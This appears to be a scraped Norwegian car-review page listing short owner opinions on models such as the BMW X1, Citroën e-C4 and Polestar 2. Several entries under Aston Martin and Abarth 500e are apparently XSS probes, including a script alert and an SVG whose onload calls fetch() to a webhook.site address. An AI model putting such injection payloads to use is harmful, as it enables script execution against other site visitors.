Vurdert av Brygg
BMW X1 (2021)
Meget godt valg for to voksne. Blir for trang med to barneseter. Meget lettkjørt, en del støy ved kjøring på motorvei. ACC slår seg lett av under kjøring i tåke, regn og lav sol. Bilen nettopp
BMW X1 (2021)
For min del har denne så langt vært en morsom opplevelse, også for lommeboken. Et godt valg hvis man har parkering med lader og kan bruke hybridteknologien fullt ut. Ingen " ladeangst" om jeg kjør
BMW X1 (2021)
Kunne vært en grei bil mhht plass og brukervennlighet, men taper på policy BMW kjører med vedlikehold av bilen for også at den skal vare etter garanti-tiden. Hybridsystemet har grei rekkevidde, me
BMW X1 (2021)
Kommer fra en større og noe dvask diesel-SUV; Jaguar F-Pace 20d. Gedigen følelse på langtur, men ble noe stor i den daglige småkjøringa. BMWen er akkurat passe stor, er utrolig kvikk og morsom å
BMW X1 (2020)
Helt ok bil. God kvalitet og fin å kjøre. Hybrid biler er hverken eller. Mye mas med lading, må jo lades etter hver tur om man skal ha nytte av El-driften. Høyt drivstofforbruk. Liten bensinmot
BMW X1 (2020)
Min første BMW er en meget positiv overraskelse - både mht kjøp, drift/service og kjøreglede. Må levere bilen inn etter 4 års leasing, og jeg kan anbefale den på det varmeste til neste eier.
BMW X1 (2020)
Mye bil for pengene. Bra sikkerhetsutstyr. Delvis analogt dashbord (hastighet/turteller) trekker litt ned. Elektrisk rekkevidde god.
BMW X1 (2019)
Kom opp som 2019-modell da jeg la inn reg nummer her, men er 2020, reg 31. mars 2020. Veldig god bil som holder seg godt i bruktpris også.
BMW X1 (2019)
Praktisk bil
BMW X1 (2019)
Elsker BMW, har også en EQC.. Selv pm EQC’n er dyrere og har noe høyere premiumfølelse, så synes jeg at at X1’n er en bedre bil.
BMW X1 (2019)
Det som trekker ned er mye hjulstøy med sommerdekk på slitt asfalt. Som er uventa på en bil til 640 tusen. Gjentatte feilmeldinger på en bil som nettopp runda 15 000 km er urovekkende.
BMW X1 (2018)
Driftsikker og meget bra kvalitet. Burde ha vært bedre støyisolert.
BMW X1 (2018)
Fantastisk bil , Vurderingen er fra en BMW entusiast gjennom mange år :-) .
BMW X1 (2017)
Kjøpte bilen brukt, har hatt den i snart 3 år og hatt null feil. Den er meget behagelig og kjøre og med svært gode seter. Praktisk og god bil.
BMW X1 (2017)
Pga. svært dårlig service fra forhandler og merkeverksted, krangle med dem i 1,5 år før dei tilstår at det faktisk er feil på bilen så får BMW stryk fra meg. Bilen er helt grei. Vært 750 000
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat